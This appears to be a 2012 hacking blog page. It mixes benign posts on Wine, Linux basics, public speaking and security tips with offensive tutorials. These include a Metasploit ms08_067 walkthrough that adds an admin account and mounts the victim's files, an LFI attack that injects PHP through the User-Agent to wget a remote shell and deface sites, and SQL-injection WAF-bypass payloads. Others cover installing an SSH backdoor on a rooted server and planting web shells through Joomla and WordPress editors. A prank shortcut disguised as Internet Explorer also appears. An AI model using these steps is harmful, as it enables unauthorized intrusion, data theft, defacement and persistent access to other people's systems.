Our social:

Latest Post

Saturday, 30 June 2012

TOP 7 WAYS TO AVOID CYBER ATTACKS




Viruses and identity theft are not new issues, but recently, individuals and companies are at a much greater risk as a result of the unanticipated increase in internet and technology use. Follow these tips to protect yourself from such an attack so that you won’t be the next victim.

Foe example, you receive an email promising a great joke if you open the attachment. You're not sure who sent it but you feel like a laugh and open it anyway. Big mistake.
Attackers can break into your computer by sending you an email attachment with malware (malicious software) or downloading malware on to your computer when you open a link on a webpage.
They want to use personal and financial details on your computer to steal money, buy things on your credit card or open up bank accounts in your name.

Anyone who uses the internet needs to be aware of basic computer security:

1. Don't click the link 

If you don't know who sent the email, or if it's not a trusted website, then don't click the link.

Beware: there is always an increase in email phishing scams around Christmas, whereby scammers have a fake retail store website and capture your credit card details when you buy online.


2. Install Antivirus software 

Always have up-to-date antivirus protection and get regular updates, Don't press 'do it later' and update six weeks later.

3. Use strong passwords 

Most of the population is still using '1234567' or their first name and last name,

The problem is that there are about 20 different things that require passwords. The strategy now is to write them down it is a complete U-turn and put them in your wallet [which is usually in a safe place]. If you lose your wallet, you stop your credit cards and can also reset all your online passwords.

* Never click 'remember my password'.

* Use capitals, lower case, numbers and symbols in passwords. Don't use words in the dictionary.

* Change passwords regularly.

* Password software is good at generating strong passwords but the human brain is the best tool of all.


4. Keep software up to date 

This will ensure your software has the latest security upgrades. Attackers are always thinking up new ways to penetrate security. Don't ignore update notifications.

5. Reconfigure wireless routers 

Buy a router with secure wireless encryption, otherwise your information is unprotected and can be stolen: for example, when banking or shopping online.

When you get a new modem from a network provider, it may not be secured to encrypt traffic. People should go to the administration panel and configure their wireless network to WPA (Wi-Fi Protected Access) or WPA2 encryption.

Reconfiguring routers is easy and something people don't do properly.

Change the name of the router to something obscure, otherwise it gives attackers information on how best to attack that router. Also, change the default login to a unique password.


6. Encrypt email 

Learn to use email encryption for sensitive documents.

Don't send emails such as a child's health resume using Gmail or Hotmail. "There was [the recent case] where a Gmail employee started going through people's email accounts."


7. Use a secure web browser 

Firefox or Opera are secure web browsers

"Internet Explorer is highly targeted by attackers because it is on so many machines. IE generally takes longer to patch or fix vulnerabilities."

Eliminating internet and computer use from your life is impossible, so be sure to practice safe computing habits to protect yourself from cyber attacks.

Do you have questions, comments, or suggestions? Feel free to post a comment!

FUNNY SHUTDOWN PRANK


In this tutorial you will learn how to make a virus joke to your friends and shut down their computer. Replace one of their used icons on the desktop with a fake one. And when they try to open it, their computer will close.


1. Right click on the desktop and go to New -> Create Shortcut.


2. Type in the windows that appears: shutdown -s -t 60 -c .Computer is shutting down.” Instead of 60 you can put what value you want. It represents the time in seconds. And also between quotes you can put what message you desire.


3. Click Next and type Internet Explorer. You can write whatever you want.


4. You will have a program like this on your desktop.


5. We need to change its icon to look like Internet Explorer. Right click on it and choose Properties.


6. Go to Shortcut ->Change Icon.


7. You can find the icon in the ones available or go to C:/Program Files/ Internet Explorer and select the icon from there.


8. After the icon is selected press Open.


9. The ‘virus’ will look like Internet Explorer.


10. And when you open it the computer will be closed in 60 seconds or whatever value you chosed.


11. The only way to stop the computer from shutting down is to go to Start->Run and type shutdown -a, and press Enter




Remember that this is just for educational purposes only and you should not harm computers and their functionality.

A SIMPLE TRICK TO LOCK YOUR COMPUTER

 Very useful when you have to leave your system on for some time and you have to go some where else...


Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open.





In the first text box, type '%windir%\\System32\\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'






You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.




Else u can simply press the \"window key + l\" to lock your computer.




You can also use the following keyboard shortcuts with a Microsoft Natural Keyboard or any other compatible keyboard that includes the Windows logo key and the Application key.



Do you have questions, comments, or suggestions? Feel free to post a comment!

FREE DOWNLOAD CEH (CERTIFIED ETHICAL HACKER MATERIALS)



Ok Here Is The Materials That Make You Most Power full Certified Ethical Hacker Globally


!! CERTIFIED ETHCIAL HACKER !!

1: Student Introduction
2: Introduction to Ethical Hacking
3: Hacking Laws
4: Footprinting
5: Google Hacking
6: Scanning
7: Enumeration
8: System Hacking
9: Trojans and Backdoors
10: Viruses and Worms
11: Sniffers
12: Social Engineering
13: Phishing
14: Hacking Email Accounts
15: Denial of Service
16: Session Hijacking
17: Hacking Webservers
18: Web Application Vulnerabilities
19: Web based Password CrackingTechniques
20: SQL Injection
21: Hacking Wireless Networks
22: Physical Security
23: Linux Hacking
24: Evading IDS Firewall and Honeypot
25: Buffer Overflows
26: Cryptography
27: Penetration Testing
28: Writing Virus Codes
29: Assembly Language Tutorial
30: Exploit Writing 1 
31: Exploit Writing 2 
32: Exploit Writing 3 
33: Reverse Engineering Techniques
34: MAC OS X Hacking
35: Hacking Routers, Cable Modems and Firewalls
36: Hacking Mobile Phones, PDA and Handheld Devices
37: Bluetooth Hacking
38: VoIP Hacking
39: RFID Hacking
40: Spamming
41: Hacking USB Devices
42: Hacking Database Servers
43: Cyber Warfare- Hacking Al-Qaida and Terrorism
44: Internet Content Filtering Techniques
45: Privacy on the Internet
46: Securing Laptop Computers
47: Spying Technologies
48: Corporate Espionage by Insiders
49: Creating Security Policies
50: Software Piracy and W
51: Hacking and Cheating Online Games
52: Hacking RSS and Atom
53: Hacking Web Browsers
54: Proxy Server Technologies
55: Preventing Data Loss
56: Hacking Global Positioning System
57: Computer Forensics and Incident Handling
58: Credit Card Frauds
59: How to Steal Passwords
60: Firewall Technologies
61: Threats and Countermeasures
62: Case Studies
63: Botnets
64: Economic Espionage
65: Patch Management
67: Security Convergence
68: Identifying the Terrorists
69: prova 312-50
70: CEH - Classroom Lab Setup v6

Download Link: 

Wednesday, 20 June 2012

SOME PUBLIC SPEAKING SKILLS



King of bollywood, Shahrukh Khan gave tips on public speaking to all, by saying, “My first rule of public speaking…if you don’t strike oil in 3 minutes…stop boring!” The ability to deliver a great speech in public is the skill, which is highly regarded. Just the knowledge of the subject is not enough to make your speech a success. There are many more ingredients to it. It’s the ability to inform and keep the audience interested, which marks the success of speech. Think of the last memorable talk or presentation you attended. So, do you have to rack your brains to remember one? Sadly, most talks are easy to forget because they lack the impact, necessary for making it memorable for audience. A great public speaker has the power to spellbind the audience, invoke emotions, and even trigger reactions from them. Mastering the art of public speaking is easy for some, while it’s a challenge for others. While some are born with this trait, others can develop it by acquiring certain skills. Here are some pointers, which will help you understand and acquire the skills needed for public speaking.
Essential Public Speaking Skills
Understand What You Want To Achieve 
Before you start working on your speech or presentation, it’s important to keep in mind the following:
Who? - Who here stands for audience. What kind of audience you are addressing to? By answering this question, you will determine the objective of your talk keeping in perspective the audience. If your audience consists of school students, your priority should be to keep the content of your speech simple and interesting so that your audience can grasp it well.  
What? – What here stands for what you wish to communicate via your talk or speech? If you are giving a talk on air pollution then you should mark down the topics you would like to cover under this, like causes, effects, and remedies of air pollution.
Why? In order to convert your audience into dedicated listeners, you need to know why they should listen to you. You should communicate to your audience, why you are speaking on the topic, and why it’s important for them to listen.Your audience should understand, that what you are speaking is something valuable and will be useful for them.
How? – How here stands for understanding the best way you can communicate your message. In this, the kind of language you will use will play an important role. Use language, which is simple and easy to grasp by your audience. The next important step, you need to do is to plan a beginning, middle, and the end of the content. You should follow a logical pattern, whenever you are speaking on a topic. If you are speaking about air pollution then it’s important to make audience aware about its causes before jumping to effects.
When? It is important for you to develop a sense of timing, when delivering a speech. While giving a speech, take effective pauses to make sure, that what you are speaking is being heard and absorbed by the audience. 
Vital Public Speaking Skills 
  • Before beginning on a topic on which you have to give a speech, it is important to research the topic well. Good speakers always research before conveying their message. 
  • When it comes to wording your message, less is always more. There might be a variety of aspects to the topic you are dealing with but you can’t cover all in your short speech so give main points or highlights of the topic to your audience. If you are using slides in your presentation then limit the content of each slide to a few bullet points.
  • Add facts, quotations, and statistics, to your speech. However, just don’t include them for the sake of using. They should effectively complement your ideas.
  • For your audience to grasp the idea easily, it’s a good idea to add humor, stories, which connect well to your core idea. Or convey your idea wrapped in the form of story. Stories are easy to understand and are loved by all.
  • Always remember that your opening words and closing words make the most of the impact on the audience. If your opening words are unable to bind the audience then you lose half the battle. Same is the case with the closing words. They should make an impact on the audience and force them to think on the topic you have just spoken about. So, while making a presentation, pay as much attention to opening and closing words as you pay to the body of the speech.
  • While making a speech or presentation, it’s very important to connect with the audience. Your first step is to maintain an eye contact with the audience while delivering the speech. Your second step should be to interact with the audience. Ask questions to your audience, this will open the channel of discussion and your audience will get involved.  
Unforgettable Delivery
You can make your speech or presentation unforgettable, if you follow these useful tips:
  • Understand the purpose of presentation.
  • Be precise and concise.
  • Use examples to bring key points of your speech to life.
  • Don't talk too fast, when delivering the speech. Pauses play an effective role. 
  • Use a variety of vocal pace, tone, voice, and volume. This will make your speech effective.
  • Don't stay stuck behind a podium. It’s essential to keep your body up-beat

Saturday, 16 June 2012

HOW TO HACK A REMOTE PC RUNNING WINDOWS WITH METASPLOIT


Have you ever wondered how you could login as an Administrator, create your own account and get any files you want from a remote computer???? Well here’s how:

FAQ:

Q: On which Windows can the hack be done?
A: – Windows 2000 SP4
- Windows XP SP1/SP2
- Windows XP Pro x64
- Windows Server 2003 SP1
- Windows Server 2003 x64
Q: From/to what os are you attacking?
A: We are attacking from Debian Linux to Windows XP SP2.

Main Part:
- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O <target ip>
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victims ip: “set RHOST <target ip>”
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3″ and hit ENTER.
- If that doesn’t work type “net use X: \\<target ip>\C: mypass /user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!
Credits:
http://extremefx.wordpress.com/2008/07/02/hack-remote-computer-windows/

Wednesday, 13 June 2012

INSTALLING WINE IN UBUNTU

What Is Wine??


* Wine allows you to run many Windows programs on Linux.
* Please consider if you really need to run the specific Windows program because in most cases, its equivalent can be provided by an OpenSource program.[/b]

I'll Help You Installing Wine 1.2 For Ubuntu..

First Of All, Open The Terminal ( Applications --> Accessories --> Terminal )

Then In Terminal Type sudo add-apt-repository ppa:ubuntu-wine/ppa To Add The Repository.You'll Be Ask For Password Of The Account, Just Put You Root (ADMIN) Password.





Then update APT's package information by running sudo apt-get update



You can now install Wine by typing sudo apt-get install wine1.2



You're Done!! You Should Now See Wine Section In Applications :)



Enjoy Your Windows Applications, Games ETC ;) To Install An Application ETC, Just Double Click On The .exe File

Friday, 8 June 2012

HOW TO CLEAR YOUR TRACKS


Hello guyz, want to clear your tracks?


Just  relax. Here are two books which will teach u how to clear tracks.


The two E-book's include:


? Tracks, log files.
? Anon-browsing
? Meta-data
? Securely deleting data
? Online private information
? Completely wiping a computer Derik’s Boot and Nuke
? Making your online-profile DOX secure
? Incognito browsing
? How to remove your history the best way
? TrueCrypt, encrypting your data
? Remove 'last used' files
? Explain why to remove cookies

I have personally read this and the info in it is really nice.. ! 

Part 1:
Code:
http://www.mediafire.com/?xgf1bqqxru9dcby


Part 2:
Code:
http://www.mediafire.com/?nkgb1mq1nupc2e4

Sunday, 3 June 2012

TCP/IP & UDP ATTACK INTRODUCTION



Hello, Lets explain "TCP/IP & UDP Attacks", Most common and effective Web attacks...Lets Know abt its basic and types...

TCP/IP Attacks
1. TCP SYN or TCP ACK Flood Attack
2. TCP Sequence Number Attack
3. TCP/IP

UDP attacks


1. ICMP Attacks
2. Smurf Attacks
3. ICMP Tunneling

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server, these ACK packets tells the server that a connection is requested. The server thus responds to the client with a ACK packet, the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually send and receives the ACK packets but it does not open the session. The server holds these sessions open, awaiting the final packet in the sequence. This cause the server to fill up the available connections and denies any requesting clients access.

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end of the network
for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent the client or the server generates a sequence number. The attacker intercepts and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense of such an attack is to know that its occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing, it involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus it can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - This occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping for instance, that uses the ICMP protocol. sPing is a good example of this type of attack, it overloads te server with more bytes than it can handle, larger connections. Its ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it send back ICMP message traffic information indicating status to the originator. If a broadcast is sent to network, all hosts will answer back to the ping. The result is an overload of network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The counter measure is to deny ICMP traffic on your network.

Warning : ICMP can be very dangerous..and Even,as i said ...Don't try such attack from your pc,untill you don't know that how to be invisible on net ! Beccause once you get traced out ...No one can help you from Troubles..

AN INTRODUCTION TO LINUX

1. What is Linux?

Linux is a free Unix-type operating system for computer devices. The operating system is what makes the hardware work together with the software. The OS is the interface that allows you to do the things you want with your computer. Linux is freely available to everyone. OS X and Windows are other widely used OS.
                                                                              

Linux gives you a graphical interface that makes it easy to use your computer, yet it still allows those with know-how to change settings by adjusting 0 to 1.
It is only the kernel that is named Linux, the rest of the OS are GNU tools. A package with the kernel and the needed tools make up a Linux distribution. Mandrake , SUSE Linux, Gentoo and Redhat are some of the many variants. GNU/Linux OS can be used on a large number of boxes, including i386+ , Alpha, PowerPC and Sparc.

2. Understanding files and folders

Linux is made with one thought in mind: Everything is a file.
A blank piece of paper is called a file in the world of computers. You can use this piece of paper to write a text or make a drawing. Your text or drawing is called information. A computer file is another way of storing your information.
If you make many drawings then you will eventually want to sort them in different piles or make some other system that allows you to easily locate a given drawing. Computers use folders to sort your files in a hieratic system.
A file is an element of data storage in a file system. Files are usually stored on harddrives, cdroms and other media, but may also be information stored in RAM or links to devices.
To organize our files into a system we use folders. The lowest possible folder is root / where you will find the user homes called /home/.
/
  /home/
  /home/mom/
  /home/dad/

Behind every configurable option there is a simple human-readable text file you can hand-edit to suit your needs. These days most programs come with nice GUI (graphical user interface) like Mandrakes Control Center and Suses YAST that can smoothly guide you through most configuration. Those who choose can gain full control of their system by manually adjusting the configuration files from foo=yes to foo=no in an editor.
Almost everything you do on a computer involves one or more files stored locally or on a network.
Your filesystems lowest folder root / contains the following folders:
/bin Essential user command binaries (for use by all users)
/boot Static files of the boot loader, only used at system startup
/dev Device files, links to your hardware devices like /dev/sound, /dev/input/js0 (joystick)
/etc Host-specific system configuration
/home User home directories. This is where you save your personal files
/lib Essential shared libraries and kernel modules
/mnt Mount point for a temporarily mounted filesystem like /mnt/cdrom
/opt Add-on application software packages
/usr /usr is the second major section of the filesystem. /usr is shareable, read-only data. That means that /usr should be shareable between various FHS-compliant hosts and must not be written to. Any information that is host-specific or varies with time is stored elsewhere.
/var /var contains variable data files. This includes spool directories and files, administrative and logging data, and transient and temporary files.
/proc System information stored in memory mirrored as files.

The only folder a normal user needs to use is /home/you/ - this is where you will be keeping all your documents.
/home/elvis/Documents
  /home/elvis/Music
  /home/elvis/Music/60s

Files are case sensitive, "myfile" and "MyFile" are two different files.
For more details, check out:

3. Understanding users and permissions

Linux is based on the idea that everyone using a system has their own username and password.
Every file belongs to a user and a group, and has a set of given attributes (read, write and executable) for users, groups and all (everybody).
A file or folder can have permissions that only allows the user it belongs to to read and write to it, allowing the group it belongs to to read it and at the same time all other users can't even read the file.

4. Who and what is root

Linux has one special user called root (this is the user name). Root is the "system administrator" and has access to all files and folders. This special user has the right to do anything.
You should never log on as this user unless you actually need to do something that requires it!
Use su - to temporary become root and do the things you need, again: never log into your sytem as root!
Root is only for system maintenance, this is not a regular user (LindowsOS don't have any user management at all and uses root for everything, this is a very bad idea!).
You can execute a command as root with:
su -c 'command done as root'
Gentoo Linux: Note that on Gentoo Linux only users that are member of the wheel group are allowed to su to root.

LFI, RFI, SQLI SCANNER DOWNLOAD

Darkjumper is a free tool who will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

·Scan sql injection, rfi, lfi, blind sql injection
· Autosql injector
· Proxy support
· Verbocity
· Autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python

Screenshot: 



Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

LFI WITH TAMPER DATA(Mozila Firefox plugin)



Requirements :
—————


> Tamper data plugin (Download : https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ )
> Dorks for finding vulnrable websites

inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Or

use following LFI scanning perl script for finding /etc/psswd and /proc/self/environ directories.

(Download LFI scanning script: http://pastebin.com/fjDN4iM5 )



LFI vulnerable website URL looks like this:

Code:
www.website.com/index.php?page=/etc/passwd
Great !!, now you are sure that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ



Click Start Tamper, and refresh your page.
Step 1.
==========

In the User-Agent field, type this
<?php phpinfo();?>



it will show php server info on the web page .



Step 2.
==========

Now we can execute code, so let’s upload upload your shell
Open TamperData again, click start tamper, and refresh website. and This time in the User-Agent enter this
<?exec(‘wget http://www.site.com/shell.txt -O shell.php’);?>


it will show the shell on the webpage…yohaa  )

Deface the website

Note:
—–
Here use a shelled website you can upload shell to

http://www.pastehtml.com

HOW TO BYPASS WEB APPLICATION FIREWALL WHILE SQL INJECTION


1. Comments


They allow us to bypass alot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:


//; --; /**/; #; -+; -- -;


2. Case Changing


Some WAF's only filter lowercase attacks, so if we change the case, we could bypass it. Example:


http://example.com/index.php?id=1/**/UnIoN/**/SeLeCt/**/1,2/* <- I also implented comments here.


3. Inline comments





Some WAF's filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

As you can see, our query is between /*!code*/, so between these characters this query will be executed.

INSTALLING BACKDOOR IN SERVER

Hey friends after the server rooting tutorial today i will tell you how to backdoor the server in few steps ;) .










Things Required :

  • Rooted server
  • Ssh backdoor
Step By Step Tutorial
  • Once we have rooted our server now we will install backdoor in it .. so to do it we will download the ssh backdoor file, we will use wget command to download it . 
Type: wget http://www.someurl.com/sshbd.zip
  • Now after we have downloaded it , we will unzip it . to unzip it we will use the following 
Type: unzip sshbd.zip
  • The after you have unziped it, now you have to run it so we will type the following command to run it 
Type: ./sshbd anypassword anyport


Note: In the above command sshbd is our backdoor file name, anypassword means there you have to write any password of your choice & in the last anyport which means you have to write any port number there . 

Now you can connect with putty & enjoy as root ;) 


Hope you all liked this simple & small tutorial !

HOW TO UPLOAD YOUR SHELL IN JOOMLA WEBSITES

In this tutorial I will be telling you how to upload your shell after getting access into the Joomla Panel. Just follow the screenshots to succesfully upload your shell.

1. First off all Login into your Joomla Panel by entering the login details.


2. When You Will be logged in, you will see a page like this.


3. See on the top and look for the option named Extension. Click on it and Select Template Manager


4. After Clicking on Template Manager, Your Joomla panel will show up the following as shown in the picture below.

5. From there choose any template and click on it, In my case I choose berk. Afer clicked on berk the following screen will came.

6. See the top right of the Panel, you will see a option named Edit HTML. Click on that.


7. Here you will see the source codes of the template. Now replace these codes with your shell's source code and click on save.
Now you can access you shell. The path of your shell will be www.site.com/templates/beez/index.php

HOW TO UPLOAD YOUR SHELL ON WORDPRESS WEBSITES

You an gain access yo admin panel of wordpress website via symlink. In this tutorial I will be telling you how to upload your shell after gaining the admin access.


1. Login into the wordpress admin panel. 
Goto  http://www.site.com/wp-admin/ or  http://www.site.com/wp-login/



2. Now on the left hand side look for the option Appreance.
3. Click on Appreance after that you will get a option "Editior" click on that after clicking on Appreance.

4. After clicking on "Editior" under Appearance you will get the following screen with the source code of the theme. Now see Right slider bar and click on any option like 404.php or comments.php


5. Replace the source codes with the codes of your shell and click on upload
You wil get your shell uploaded here
http://www.site.com/wp-content/themes/themename/yourshell.php